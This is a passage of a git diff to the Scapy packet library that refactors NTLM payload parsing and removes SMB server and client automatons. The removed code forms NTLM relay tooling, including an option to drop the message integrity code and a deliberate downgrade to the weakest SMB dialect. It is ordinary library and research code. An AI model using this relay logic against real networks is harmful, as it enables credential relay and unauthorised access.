- offset = len(buf) - buf.append(field.addfield(pkt, b"", value), offset + 1) - return bytes(buf) - def _on_payload(self, pkt, x, func): # type: (Optional[Packet], bytes, str) -> List[Tuple[str, Any]] if not pkt or not x: @@ -164,12 +130,48 @@ def i2repr(self, pkt, x): # type: (Optional[Packet], bytes) -> str return repr(self._on_payload(pkt, x, "i2repr")) + def addfield(self, pkt, s, val): + # type: (Optional[Packet], bytes, Optional[List[Tuple[str, str]]]) -> bytes + buf = StringBuffer() + for field_name, value in val: + if field_name not in self.fields_map: + continue + field = self.fields_map[field_name] + offset = pkt.getfieldval(field_name + "BufferOffset") + if offset is not None: + offset -= self.offset + else: + offset = len(buf) + buf.append(field.addfield(pkt, b"", value), offset + 1) + return s + bytes(buf) + def getfield(self, pkt, s): - # type: (Packet, bytes) -> Tuple[bytes, bytes] + # type: (Packet, bytes) -> Tuple[bytes, List[Tuple[str, str]]] if self.length_from is None: - return b"", self.m2i(pkt, s) - len_pkt = self.length_from(pkt) - return s[len_pkt:], self.m2i(pkt, s[:len_pkt]) + ret, remain = b"", s + else: + len_pkt = self.length_from(pkt) + ret, remain = s[len_pkt:], s[:len_pkt] + if not pkt or not remain: + return s, [] + results = [] + max_offset = 0 + for field in self.fields: + offset = pkt.getfieldval(field.name + "BufferOffset") - self.offset + try: + length = pkt.getfieldval(field.name + "Len") + except AttributeError: + length = len(remain) - offset + if offset < 0: + continue + max_offset = max(offset + length, max_offset) + if remain[offset:offset + length]: + results.append((offset, field.name, field.getfield( + pkt, remain[offset:offset + length])[1])) + if max_offset: + ret += remain[max_offset:] + results.sort(key=lambda x: x[0]) + return ret, [x[1:] for x in results] class _NTLMPayloadPacket(Packet): @@ -197,19 +199,24 @@ def setfieldval(self, attr, val): return super(_NTLMPayloadPacket, self).setfieldval(attr, val) except AttributeError: Payload = super(_NTLMPayloadPacket, self).__getattr__( - self.self._NTLM_PAYLOAD_FIELD_NAME + self._NTLM_PAYLOAD_FIELD_NAME ) - Payload.pop(next( - i - for i, x in enumerate( - super(_NTLMPayloadPacket, self).__getattr__( - self.self._NTLM_PAYLOAD_FIELD_NAME - )) - if x[0] == attr - )) + if attr not in self.get_field(self._NTLM_PAYLOAD_FIELD_NAME).fields_map: + raise AttributeError(attr) + try: + Payload.pop(next( + i + for i, x in enumerate( + super(_NTLMPayloadPacket, self).__getattr__( + self._NTLM_PAYLOAD_FIELD_NAME + )) + if x[0] == attr + )) + except StopIteration: + pass Payload.append([attr, val]) super(_NTLMPayloadPacket, self).setfieldval( - self.self._NTLM_PAYLOAD_FIELD_NAME, + self._NTLM_PAYLOAD_FIELD_NAME, Payload ) @@ -480,7 +487,7 @@ class NTLMv2_CLIENT_CHALLENGE(Packet): LEIntField("Reserved2", 0), UTCTimeField("TimeStamp", None, fmt=" None self.cli_atmt = cli_atmt - def get_token(self): + def get_token(self, negoex=False): + if negoex: + # Special case: negoex + if self.cli_atmt: + return self.cli_atmt.token_pipe.recv() + else: + self.token_pipe.clear() + return None, None, None, None from random import randint - if self.cli_atmt: - return self.cli_atmt.token_pipe.recv() - elif self.ntlm_state == 0: + if self.ntlm_state == 0: + # First token asked (after negotiate) self.ntlm_state = 1 - return NTLM_CHALLENGE( - ServerChallenge=self.ntlm_values.get( - "ServerChallenge", struct.pack("= 0x300: # SMB3 - raise ValueError( - "SMB client requires SMB3 which is unimplemented.") - else: - DialectIndexes = [ - x.DialectString for x in pkt[SMBNegotiate_Request].Dialects - ] - if self.ALLOW_SMB2: - # Find a value matching SMB2, fallback to SMB1 - for key, rev in [(b"SMB 2.???", 0x02ff), - (b"SMB 2.002", 0x0202)]: - try: - DialectIndex = DialectIndexes.index(key) - DialectRevision = rev - self.SMB2 = True - break - except ValueError: - pass - else: - DialectIndex = DialectIndexes.index(b"NT LM 0.12") - else: - # Enforce SMB1 - DialectIndex = DialectIndexes.index(b"NT LM 0.12") - if DialectRevision and DialectRevision & 0xff != 0xff: - # Version isn't SMB X.??? - self.Dialect = DialectRevision - cls = None - if self.SMB2: - # SMB2 - cls = SMB2_Negotiate_Protocol_Response - self.smb_header = NBTSession() / SMB2_Header( - CreditsRequested=1, - ) - if SMB2_Negotiate_Protocol_Request in pkt: - self.smb_header.MID = pkt.MID - self.smb_header.TID = pkt.TID - self.smb_header.AsyncId = pkt.AsyncId - self.smb_header.SessionId = pkt.SessionId - else: - # SMB1 - self.smb_header = NBTSession() / SMB_Header( - Flags="REPLY+CASE_INSENSITIVE+CANONICALIZED_PATHS", - Flags2=( - "LONG_NAMES+EAS+NT_STATUS+SMB_SECURITY_SIGNATURE+" - "UNICODE+EXTENDED_SECURITY" - ), - TID=pkt.TID, - MID=pkt.MID, - UID=pkt.UID, - PIDLow=pkt.PIDLow - ) - if self.EXTENDED_SECURITY: - cls = SMBNegotiate_Response_Extended_Security - else: - cls = SMBNegotiate_Response_Security - if self.SMB2: - # SMB2 - resp = self.smb_header.copy() / cls( - DialectRevision=DialectRevision, - Capabilities="DFS", - SecurityMode=3 if self.REQUIRE_SIGNATURE else 0, - # self.get("SecurityMode", 1), - ServerTime=self.get("ServerTime", time.time() + 11644473600), - ServerStartTime=0, - MaxTransactionSize=65536, - MaxReadSize=65536, - MaxWriteSize=65536, - ) - else: - # SMB1 - resp = self.smb_header.copy() / cls( - DialectIndex=DialectIndex, - ServerCapabilities=( - "UNICODE+LARGE_FILES+NT_SMBS+RPC_REMOTE_APIS+STATUS32+" - "LEVEL_II_OPLOCKS+LOCK_AND_READ+NT_FIND+" - "LWIO+INFOLEVEL_PASSTHRU+LARGE_READX+LARGE_WRITEX" - ), - SecurityMode=( - 3 if self.REQUIRE_SIGNATURE - else self.get("SecurityMode", 1)), - ServerTime=self.get("ServerTime"), - ServerTimeZone=self.get("ServerTimeZone") - ) - if self.EXTENDED_SECURITY: - resp.ServerCapabilities += "EXTENDED_SECURITY" - if self.EXTENDED_SECURITY or self.SMB2: - # Extended SMB1 / SMB2 - # Add security blob - resp.SecurityBlob = GSSAPI_BLOB( - innerContextToken=SPNEGO_negToken( - token=SPNEGO_negTokenInit( - mechTypes=[ - # NEGOEX - Optional. See below - # NTLMSSP - SPNEGO_MechType(oid="1.3.6.1.4.1.311.2.2.10")], - - ) - ) - ) - resp.GUID = self.get("GUID", RandUUID()) - if self.PASS_NEGOEX: # NEGOEX handling - # NOTE: NegoEX has an effect on how the SecurityContext is - # initialized, as detailed in [MS-AUTHSOD] sect 3.3.2 - # But the format that the Exchange token uses appears not to - # be documented :/ - resp.SecurityBlob.innerContextToken.token.mechTypes.insert( - 0, - # NEGOEX - SPNEGO_MechType(oid="1.3.6.1.4.1.311.2.2.30"), - ) - resp.SecurityBlob.innerContextToken.token.mechToken = SPNEGO_Token( # noqa: E501 - value=negoex_token - ) - else: - # Non-extended SMB1 - resp.Challenge = self.get("Challenge") - resp.DomainName = self.get("DomainName") - resp.ServerName = self.get("ServerName") - resp.Flags2 -= "EXTENDED_SECURITY" - if not self.SMB2: - resp[SMB_Header].Flags2 = resp[SMB_Header].Flags2 - \ - "SMB_SECURITY_SIGNATURE" + \ - "SMB_SECURITY_SIGNATURE_REQUIRED+IS_LONG_NAME" - self.send(resp) - - @ATMT.state() - def NEGOTIATED(self): - pass - - @ATMT.receive_condition(NEGOTIATED) - def received_negotiate_smb2(self, pkt): - if SMB2_Negotiate_Protocol_Request in pkt: - raise self.NEGOTIATED().action_parameters(pkt) - - @ATMT.action(received_negotiate_smb2) - def on_negotiate_smb2(self, pkt): - self.on_negotiate(pkt) - - @ATMT.receive_condition(NEGOTIATED) - def receive_setup_andx_request(self, pkt): - if SMBSession_Setup_AndX_Request_Extended_Security in pkt or \ - SMBSession_Setup_AndX_Request in pkt: - # SMB1 - if SMBSession_Setup_AndX_Request_Extended_Security in pkt: - # Extended - ntlm_tuple = self._get_token( - pkt.SecurityBlob - ) - else: - # Non-extended - self.set_cli("AccountName", pkt.AccountName) - self.set_cli("PrimaryDomain", - pkt.PrimaryDomain) - self.set_cli("Path", pkt.Path) - self.set_cli("Service", pkt.Service) - ntlm_tuple = self._get_token( - pkt[SMBSession_Setup_AndX_Request].UnicodePassword - ) - self.set_cli("VCNumber", pkt.VCNumber) - self.set_cli("SecuritySignature", pkt.SecuritySignature) - self.set_cli("UID", pkt.UID) - self.set_cli("MID", pkt.MID) - self.set_cli("TID", pkt.TID) - self.received_ntlm_token(ntlm_tuple) - raise self.RECEIVED_SETUP_ANDX_REQUEST().action_parameters(pkt) - elif SMB2_Session_Setup_Request in pkt: - # SMB2 - ntlm_tuple = self._get_token(pkt.SecurityBlob) - self.set_cli("SecuritySignature", pkt.SecuritySignature) - self.set_cli("MID", pkt.MID) - self.set_cli("TID", pkt.TID) - self.set_cli("AsyncId", pkt.AsyncId) - self.set_cli("SessionId", pkt.SessionId) - self.set_cli("SecurityMode", pkt.SecurityMode) - self.received_ntlm_token(ntlm_tuple) - raise self.RECEIVED_SETUP_ANDX_REQUEST().action_parameters(pkt) - - @ATMT.state() - def RECEIVED_SETUP_ANDX_REQUEST(self): - pass - - @ATMT.action(receive_setup_andx_request) - def on_setup_andx_request(self, pkt): - ntlm_token, negResult, MIC, rawToken = ntlm_tuple = self.get_token() - # rawToken == whether the GSSAPI ASN.1 wrapper is used - # typically, when a SMB session **falls back** to NTLM, no - # wrapper is used - if SMBSession_Setup_AndX_Request_Extended_Security in pkt or \ - SMBSession_Setup_AndX_Request in pkt or\ - SMB2_Session_Setup_Request in pkt: - if SMB2_Session_Setup_Request in pkt: - # SMB2 - self.smb_header.MID = self.get( - "MID", self.smb_header.MID + 1) - self.smb_header.TID = self.get( - "TID", self.smb_header.TID) - if self.smb_header.Flags.SMB2_FLAGS_ASYNC_COMMAND: - self.smb_header.AsyncId = self.get( - "AsyncId", self.smb_header.AsyncId) - self.smb_header.SessionId = self.get( - "SessionId", self.smb_header.SessionId) - else: - # SMB1 - self.smb_header.UID = self.get("UID") - self.smb_header.MID = self.get("MID") - self.smb_header.TID = self.get("TID") - if ntlm_tuple == (None, None, None, None): - # Error - if SMB2_Session_Setup_Request in pkt: - # SMB2 - resp = self.smb_header.copy() / \ - SMB2_Session_Setup_Response() - else: - # SMB1 - resp = self.smb_header.copy() / SMBSession_Null() - resp.Status = self.get("Status", 0xc000006d) - else: - # Negotiation - if SMBSession_Setup_AndX_Request_Extended_Security in pkt or\ - SMB2_Session_Setup_Request in pkt: - # SMB1 extended / SMB2 - if SMB2_Session_Setup_Request in pkt: - # SMB2 - resp = self.smb_header.copy() / \ - SMB2_Session_Setup_Response() - if self.GUEST_LOGIN: - resp.SessionFlags = "IS_GUEST" - if self.ANONYMOUS_LOGIN: - resp.SessionFlags = "IS_NULL" - else: - # SMB1 extended - resp = self.smb_header.copy() / \ - SMBSession_Setup_AndX_Response_Extended_Security( - NativeOS=self.get("NativeOS"), - NativeLanMan=self.get("NativeLanMan") - ) - if self.GUEST_LOGIN: - resp.Action = "SMB_SETUP_GUEST" - if not ntlm_token: - # No token (e.g. accepted) - resp.SecurityBlob = SPNEGO_negToken( - token=SPNEGO_negTokenResp( - negResult=negResult, - ) - ) - if MIC and not self.DROP_MIC: # Drop the MIC? - resp.SecurityBlob.token.mechListMIC = SPNEGO_MechListMIC( # noqa: E501 - value=MIC - ) - if negResult == 0: - self.authenticated = True - elif isinstance(ntlm_token, NTLM_CHALLENGE) \ - and not rawToken: - resp.SecurityBlob = SPNEGO_negToken( - token=SPNEGO_negTokenResp( - negResult=1, - supportedMech=SPNEGO_MechType( - # NTLMSSP - oid="1.3.6.1.4.1.311.2.2.10"), - responseToken=SPNEGO_Token( - value=ntlm_token - ) - ) - ) - else: - # Token is raw or unknown - resp.SecurityBlob = ntlm_token - elif SMBSession_Setup_AndX_Request in pkt: - # Non-extended - resp = self.smb_header.copy() / \ - SMBSession_Setup_AndX_Response( - NativeOS=self.get("NativeOS"), - NativeLanMan=self.get("NativeLanMan") - ) - resp.Status = self.get( - "Status", 0x0 if self.authenticated else 0xc0000016) - self.send(resp) - - @ATMT.condition(RECEIVED_SETUP_ANDX_REQUEST) - def wait_for_next_request(self): - if self.authenticated: - raise self.AUTHENTICATED() - else: - raise self.NEGOTIATED() - - @ATMT.state() - def AUTHENTICATED(self): - """Dev: overload this""" - pass - - @ATMT.condition(AUTHENTICATED, prio=0) - def should_serve(self): - if self.SERVE_FILES: - # Serve files - raise self.SERVING() - - @ATMT.condition(AUTHENTICATED, prio=1) - def should_end(self): - if not self.ECHO: - # Close connection - raise self.END() - - @ATMT.receive_condition(AUTHENTICATED, prio=2) - def receive_packet_echo(self, pkt): - if self.ECHO: - raise self.AUTHENTICATED().action_parameters(pkt) - - def _response_validate_negotiate_info(self): - pkt = self.smb_header.copy() / \ - SMB2_Error_Response(ErrorData=b"\xff") - pkt.Status = "STATUS_NOT_SUPPORTED" - pkt.Command = "SMB2_IOCTL" - self.send(pkt) - - @ATMT.action(receive_packet_echo) - def pass_packet(self, pkt): - # Pre-process some of the data if possible - pkt.show() - if not self.SMB2: - # SMB1 - no signature (disabled by our implementation) - if SMBTree_Connect_AndX in pkt and self.REAL_HOSTNAME: - pkt.LENGTH = None - pkt.ByteCount = None - pkt.Path = ( - "\\\\%s\\" % self.REAL_HOSTNAME + - pkt.Path[2:].split("\\", 1)[1] - ) - else: - self.smb_header.MID += 1 - # SMB2 - if SMB2_IOCTL_Request in pkt and pkt.CtlCode == 0x00140204: - # FSCTL_VALIDATE_NEGOTIATE_INFO - # This is a security measure asking the server to validate - # what flags were negotiated during the SMBNegotiate exchange. - # This packet is ALWAYS signed, and expects a signed response. - - # https://docs.microsoft.com/en-us/archive/blogs/openspecification/smb3-secure-dialect-negotiation - # > "Down-level servers (pre-Windows 2012) will return - # > STATUS_NOT_SUPPORTED or STATUS_INVALID_DEVICE_REQUEST - # > since they do not allow or implement - # > FSCTL_VALIDATE_NEGOTIATE_INFO. - # > The client should accept the - # > response provided it's properly signed". - - # Since we can't sign the response, modern clients will abort - # the connection after receiving this, despite our best - # efforts... - self._response_validate_negotiate_info() - return - self.echo(pkt) - - @ATMT.state() - def SERVING(self): - """ - Main state when serving files - """ - pass - - @ATMT.receive_condition(SERVING) - def receive_tree_connect(self, pkt): - if SMB2_Tree_Connect_Request in pkt: - raise self.SERVING().action_parameters(pkt) - - @ATMT.action(receive_tree_connect) - def send_tree_connect_response(self, pkt): - self.smb_header.TID = 0x1 - self.smb_header.MID = pkt.MID - self.send(self.smb_header / SMB2_Tree_Connect_Response( - ShareType="PIPE", - ShareFlags="AUTO_CACHING+NO_CACHING", - Capabilities=0, - MaximalAccess="+".join( - ['FILE_LIST_DIRECTORY', - 'FILE_ADD_FILE', - 'FILE_ADD_SUBDIRECTORY', - 'FILE_READ_EA', - 'FILE_WRITE_EA', - 'FILE_TRAVERSE', - 'FILE_DELETE_CHILD', - 'FILE_READ_ATTRIBUTES', - 'FILE_WRITE_ATTRIBUTES', - 'DELETE', - 'READ_CONTROL', - 'WRITE_DAC', - 'WRITE_OWNER', - 'SYNCHRONIZE', - 'ACCESS_SYSTEM_SECURITY']) - )) - - @ATMT.receive_condition(SERVING) - def receive_ioctl(self, pkt): - if SMB2_IOCTL_Request in pkt: - raise self.SERVING().action_parameters(pkt) - - @ATMT.action(receive_ioctl) - def send_ioctl_response(self, pkt): - self.smb_header.MID = pkt.MID - self._response_validate_negotiate_info() - - @ATMT.receive_condition(SERVING) - def receive_create_file(self, pkt): - if SMB2_Create_Request in pkt: - raise self.SERVING().action_parameters(pkt) - - @ATMT.action(receive_create_file) - def send_create_file_response(self, pkt): - self.smb_header.MID = pkt.MID - self.send( - self.smb_header.copy() / SMB2_Create_Response( - FileId=SMB2_FILEID(Persistent=0x4000000012, - Volatile=0x4000000001) - ) - ) - - @ATMT.receive_condition(SERVING) - def receive_query_info(self, pkt): - if SMB2_Query_Info_Request in pkt: - raise self.SERVING().action_parameters(pkt) - - @ATMT.action(receive_query_info) - def send_query_info_response(self, pkt): - self.smb_header.MID = pkt.MID - if pkt.InfoType == 0x01: # SMB2_0_INFO_FILE - if pkt.FileInfoClass == 0x05: # FileStandardInformation - self.send( - self.smb_header.copy() / SMB2_Query_Info_Response( - Buffer=[('Output', - FileStandardInformation( - AllocationSize=4096, - DeletePending=1))] - ) - ) - - @ATMT.state() - def PIPE_WRITTEN(self): - pass - - @ATMT.receive_condition(SERVING) - def receive_write_request(self, pkt): - if SMB2_Write_Request in pkt: - fi = pkt.FileId - if fi.Persistent == 0x4000000012 and fi.Volatile == 0x4000000001: - # The srvsvc file - raise self.PIPE_WRITTEN().action_parameters(pkt) - raise self.SERVING().action_parameters(pkt) - - @ATMT.action(receive_write_request) - def send_write_response(self, pkt): - self.smb_header.MID = pkt.MID - self.send( - self.smb_header.copy() / SMB2_Write_Response( - Count=len(pkt.Data) - ) - ) - - @ATMT.receive_condition(PIPE_WRITTEN) - def receive_read_request(self, pkt): - if SMB2_Read_Request in pkt: - raise self.SERVING().action_parameters(pkt) - - @ATMT.action(receive_read_request) - def send_read_response(self, pkt): - self.smb_header.MID = pkt.MID - # TODO - implement pipe logic - self.send( - self.smb_header.copy() / SMB2_Read_Response() - ) - - @ATMT.receive_condition(SERVING) - def receive_close_request(self, pkt): - if SMB2_Close_Request in pkt: - raise self.SERVING().action_parameters(pkt) - - @ATMT.action(receive_close_request) - def send_close_response(self, pkt): - self.smb_header.MID = pkt.MID - self.send( - self.smb_header.copy() / SMB2_Close_Response() - ) - - @ATMT.state(final=1) - def END(self): - self.end() - - -class NTLM_SMB_Client(NTLM_Client, Automaton): - port = 445 - cls = NBTSession - kwargs_cls = { - NTLM_SMB_Server: {"CLIENT_PROVIDES_NEGOEX": True, "ECHO": True} - } - - def __init__(self, *args, **kwargs): - self.EXTENDED_SECURITY = kwargs.pop("EXTENDED_SECURITY", True) - self.ALLOW_SMB2 = kwargs.pop("ALLOW_SMB2", True) - self.REAL_HOSTNAME = kwargs.pop("REAL_HOSTNAME", None) - self.RETURN_SOCKET = kwargs.pop("RETURN_SOCKET", None) - self.RUN_SCRIPT = kwargs.pop("RUN_SCRIPT", None) - self.SMB2 = False - super(NTLM_SMB_Client, self).__init__(*args, **kwargs) - - @ATMT.state(initial=1) - def BEGIN(self): - pass - - @ATMT.condition(BEGIN) - def continue_smb2(self): - kwargs = self.wait_server() - self.CONTINUE_SMB2 = kwargs.pop("CONTINUE_SMB2", False) - self.SMB2_INIT_PARAMS = kwargs.pop("SMB2_INIT_PARAMS", {}) - if self.CONTINUE_SMB2: - self.SMB2 = True - self.smb_header = NBTSession() / SMB2_Header( - PID=0xfeff - ) - raise self.SMB2_NEGOTIATE() - - @ATMT.condition(BEGIN, prio=1) - def send_negotiate(self): - raise self.SENT_NEGOTIATE() - - @ATMT.action(send_negotiate) - def on_negotiate(self): - self.smb_header = NBTSession() / SMB_Header( - Flags2=( - "LONG_NAMES+EAS+NT_STATUS+UNICODE+" - "SMB_SECURITY_SIGNATURE+EXTENDED_SECURITY" - ), - TID=0xFFFF, - PIDLow=0xFEFF, - UID=0, - MID=0 - ) - if self.EXTENDED_SECURITY: - self.smb_header.Flags2 += "EXTENDED_SECURITY" - pkt = self.smb_header.copy() / SMBNegotiate_Request( - Dialects=[SMB_Dialect(DialectString=x) for x in [ - "PC NETWORK PROGRAM 1.0", "LANMAN1.0", - "Windows for Workgroups 3.1a", "LM1.2X002", "LANMAN2.1", - "NT LM 0.12" - ] + (["SMB 2.002", "SMB 2.???"] if self.ALLOW_SMB2 else []) - ], - ) - if not self.EXTENDED_SECURITY: - pkt.Flags2 -= "EXTENDED_SECURITY" - pkt[SMB_Header].Flags2 = pkt[SMB_Header].Flags2 - \ - "SMB_SECURITY_SIGNATURE" + \ - "SMB_SECURITY_SIGNATURE_REQUIRED+IS_LONG_NAME" - self.send(pkt) - - @ATMT.state() - def SENT_NEGOTIATE(self): - pass - - @ATMT.receive_condition(SENT_NEGOTIATE) - def receive_negotiate_response(self, pkt): - if SMBNegotiate_Response_Security in pkt or\ - SMBNegotiate_Response_Extended_Security in pkt or\ - SMB2_Negotiate_Protocol_Response in pkt: - self.set_srv( - "ServerTime", - pkt.ServerTime - ) - self.set_srv( - "SecurityMode", - pkt.SecurityMode - ) - if SMB2_Negotiate_Protocol_Response in pkt: - # SMB2 - self.SMB2 = True # We are using SMB2 to talk to the server - self.smb_header = NBTSession() / SMB2_Header( - PID=0xfeff - ) - else: - # SMB1 - self.set_srv( - "ServerTimeZone", - pkt.ServerTimeZone - ) - if SMBNegotiate_Response_Extended_Security in pkt or\ - SMB2_Negotiate_Protocol_Response in pkt: - # Extended SMB1 / SMB2 - negoex_tuple = self._get_token( - pkt.SecurityBlob - ) - self.set_srv( - "GUID", - pkt.GUID - ) - self.received_ntlm_token(negoex_tuple) - if SMB2_Negotiate_Protocol_Response in pkt and \ - pkt.DialectRevision in [0x02ff, 0x03ff]: - # There will be a second negotiate protocol request - self.smb_header.MID += 1 - raise self.SMB2_NEGOTIATE() - else: - raise self.NEGOTIATED() - elif SMBNegotiate_Response_Security in pkt: - # Non-extended SMB1 - self.set_srv("Challenge", pkt.Challenge) - self.set_srv("DomainName", pkt.DomainName) - self.set_srv("ServerName", pkt.ServerName) - self.received_ntlm_token((None, None, None, None)) - raise self.NEGOTIATED() - - @ATMT.state() - def SMB2_NEGOTIATE(self): - pass - - @ATMT.condition(SMB2_NEGOTIATE) - def send_negotiate_smb2(self): - raise self.SENT_NEGOTIATE() - - @ATMT.action(send_negotiate_smb2) - def on_negotiate_smb2(self): - pkt = self.smb_header.copy() / SMB2_Negotiate_Protocol_Request( - # Only ask for SMB 2.0.2 because it has the lowest security - Dialects=[0x0202], - Capabilities=( - "DFS+Leasing+LargeMTU+MultiChannel+" - "PersistentHandles+DirectoryLeasing+Encryption" - ), - SecurityMode=0, - ClientGUID=self.SMB2_INIT_PARAMS.get("ClientGUID", RandUUID()), - ) - self.send(pkt) - - @ATMT.state() - def NEGOTIATED(self): - pass - - @ATMT.condition(NEGOTIATED) - def should_send_setup_andx_request(self): - ntlm_tuple = self.get_token() - raise self.SENT_SETUP_ANDX_REQUEST().action_parameters(ntlm_tuple) - - @ATMT.state() - def SENT_SETUP_ANDX_REQUEST(self): - pass - - @ATMT.action(should_send_setup_andx_request) - def send_setup_andx_request(self, ntlm_tuple): - ntlm_token, negResult, MIC, rawToken = ntlm_tuple - self.smb_header.MID = self.get("MID") - self.smb_header.TID = self.get("TID") - if self.SMB2: - self.smb_header.AsyncId = self.get("AsyncId") - self.smb_header.SessionId = self.get("SessionId") - else: - self.smb_header.UID = self.get("UID", 0) - if self.SMB2 or self.EXTENDED_SECURITY: - # SMB1 extended / SMB2 - if self.SMB2: - # SMB2 - pkt = self.smb_header.copy() / SMB2_Session_Setup_Request( - Capabilities="DFS", - SecurityMode=0, - ) - pkt.CreditsRequested = 33 - else: - # SMB1 extended - pkt = self.smb_header.copy() / \ - SMBSession_Setup_AndX_Request_Extended_Security( - ServerCapabilities=( - "UNICODE+NT_SMBS+STATUS32+LEVEL_II_OPLOCKS+" - "DYNAMIC_REAUTH+EXTENDED_SECURITY" - ), - VCNumber=self.get("VCNumber"), - NativeOS=b"", - NativeLanMan=b"" - ) - pkt.SecuritySignature = self.get("SecuritySignature") - if isinstance(ntlm_token, NTLM_NEGOTIATE): - if rawToken: - pkt.SecurityBlob = ntlm_token - else: - pkt.SecurityBlob = GSSAPI_BLOB( - innerContextToken=SPNEGO_negToken( - token=SPNEGO_negTokenInit( - mechTypes=[ - # NTLMSSP - SPNEGO_MechType(oid="1.3.6.1.4.1.311.2.2.10")], # noqa: E501 - mechToken=SPNEGO_Token( - value=ntlm_token - ) - ) - ) - ) - elif isinstance(ntlm_token, (NTLM_AUTHENTICATE, - NTLM_AUTHENTICATE_V2)): - pkt.SecurityBlob = SPNEGO_negToken( - token=SPNEGO_negTokenResp( - negResult=negResult, - ) - ) - # Token may be missing (e.g. STATUS_MORE_PROCESSING_REQUIRED) - if ntlm_token: - pkt.SecurityBlob.token.responseToken = SPNEGO_Token( - value=ntlm_token - ) - if MIC and not self.DROP_MIC: # Drop the MIC? - pkt.SecurityBlob.token.mechListMIC = SPNEGO_MechListMIC( - value=MIC - ) - else: - # Non-extended security - pkt = self.smb_header.copy() / SMBSession_Setup_AndX_Request( - ServerCapabilities="UNICODE+NT_SMBS+STATUS32+LEVEL_II_OPLOCKS", - VCNumber=self.get("VCNumber"), - NativeOS=b"", - NativeLanMan=b"", - OEMPassword=b"\0" * 24, - UnicodePassword=ntlm_token, - PrimaryDomain=self.get("PrimaryDomain"), - AccountName=self.get("AccountName"), - ) / SMBTree_Connect_AndX( - Flags="EXTENDED_RESPONSE", - Password=b"\0", - ) - pkt.PrimaryDomain = self.get("PrimaryDomain") - pkt.AccountName = self.get("AccountName") - pkt.Path = ( - "\\\\%s\\" % self.REAL_HOSTNAME + - self.get("Path")[2:].split("\\", 1)[1] - ) - pkt.Service = self.get("Service") - self.send(pkt) - - @ATMT.receive_condition(SENT_SETUP_ANDX_REQUEST) - def receive_setup_andx_response(self, pkt): - if SMBSession_Null in pkt or \ - SMBSession_Setup_AndX_Response_Extended_Security in pkt or \ - SMBSession_Setup_AndX_Response in pkt: - # SMB1 - self.set_srv("Status", pkt[SMB_Header].Status) - self.set_srv( - "UID", - pkt[SMB_Header].UID - ) - self.set_srv( - "MID", - pkt[SMB_Header].MID - ) - self.set_srv( - "TID", - pkt[SMB_Header].TID - ) - if SMBSession_Null in pkt: - # Likely an error - self.received_ntlm_token((None, None, None, None)) - raise self.NEGOTIATED() - elif SMBSession_Setup_AndX_Response_Extended_Security in pkt or \ - SMBSession_Setup_AndX_Response in pkt: - self.set_srv( - "NativeOS", - pkt.getfieldval( - "NativeOS") - ) - self.set_srv( - "NativeLanMan", - pkt.getfieldval( - "NativeLanMan") - ) - if SMB2_Session_Setup_Response in pkt: - # SMB2 - self.set_srv("Status", pkt.Status) - self.set_srv("SecuritySignature", pkt.SecuritySignature) - self.set_srv("MID", pkt.MID) - self.set_srv("TID", pkt.TID) - self.set_srv("AsyncId", pkt.AsyncId) - self.set_srv("SessionId", pkt.SessionId) - if SMBSession_Setup_AndX_Response_Extended_Security in pkt or \ - SMB2_Session_Setup_Response in pkt: - # SMB1 extended / SMB2 - _, negResult, _, _ = ntlm_tuple = self._get_token( - pkt.SecurityBlob - ) - if negResult == 0: # Authenticated - self.received_ntlm_token(ntlm_tuple) - raise self.AUTHENTICATED() - else: - self.received_ntlm_token(ntlm_tuple) - raise self.NEGOTIATED().action_parameters(pkt) - elif SMBSession_Setup_AndX_Response_Extended_Security in pkt: - # SMB1 non-extended - pass - - @ATMT.state() - def AUTHENTICATED(self): - pass - - @ATMT.condition(AUTHENTICATED, prio=0) - def authenticated_post_actions(self): - if self.RETURN_SOCKET: - raise self.SOCKET_MODE() - if self.RUN_SCRIPT: - raise self.DO_RUN_SCRIPT() - - @ATMT.receive_condition(AUTHENTICATED, prio=1) - def receive_packet(self, pkt): - raise self.AUTHENTICATED().action_parameters(pkt) - - @ATMT.action(receive_packet) - def pass_packet(self, pkt): - self.echo(pkt) - - @ATMT.state(final=1) - def DO_RUN_SCRIPT(self): - # This is an example script, mostly unimplemented... - # Tree connect - self.smb_header.MID += 1 - self.send( - self.smb_header.copy() / - SMB2_Tree_Connect_Request( - Buffer=[('Path', '\\\\%s\\IPC$' % self.REAL_HOSTNAME)] - ) - ) - # Create srvsvc - self.smb_header.MID += 1 - pkt = self.smb_header.copy() - pkt.Command = "SMB2_CREATE" - pkt /= Raw(load=b'9\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x12\x00\x00\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00x\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00s\x00r\x00v\x00s\x00v\x00c\x00') # noqa: E501 - self.send(pkt) - # ... run something? - self.end() - - @ATMT.state() - def SOCKET_MODE(self): - pass - - @ATMT.receive_condition(SOCKET_MODE) - def incoming_data_received(self, pkt): - raise self.SOCKET_MODE().action_parameters(pkt) - - @ATMT.action(incoming_data_received) - def receive_data(self, pkt): - self.oi.smbpipe.send(bytes(pkt)) - - @ATMT.ioevent(SOCKET_MODE, name="smbpipe", as_supersocket="smblink") - def outgoing_data_received(self, fd): - raise self.ESTABLISHED().action_parameters(fd.recv()) - - @ATMT.action(outgoing_data_received) - def send_data(self, d): - self.smb_header.MID += 1 - self.send(self.smb_header.copy() / d) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 40619620379..3fc274543a2 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -27,6 +27,7 @@ LEShortEnumField, LEShortField, MultipleTypeField, + PadField, PacketField, PacketLenField, PacketListField, @@ -35,6 +36,7 @@ ShortField, StrFieldUtf16, StrFixedLenField, + StrLenFieldUtf16, StrLenField, UTCTimeField, UUIDField, @@ -45,6 +47,7 @@ XStrFixedLenField, ) +from scapy.layers.netbios import NBTSession from scapy.layers.gssapi import GSSAPI_BLOB from scapy.layers.ntlm import _NTLMPayloadField, _NTLMPayloadPacket @@ -62,12 +65,21 @@ # SMB2 sect 3.3.5.15 + [MS-ERREF] STATUS_ERREF = { 0x00000000: "STATUS_SUCCESS", - 0xC000009A: "STATUS_INSUFFICIENT_RESOURCES", + 0x00000103: "STATUS_PENDING", + 0x0000010C: "STATUS_NOTIFY_ENUM_DIR", + 0xC0000016: "STATUS_MORE_PROCESSING_REQUIRED", 0xC0000022: "STATUS_ACCESS_DENIED", + 0xC0000034: "STATUS_OBJECT_NAME_NOT_FOUND", + 0xC000009A: 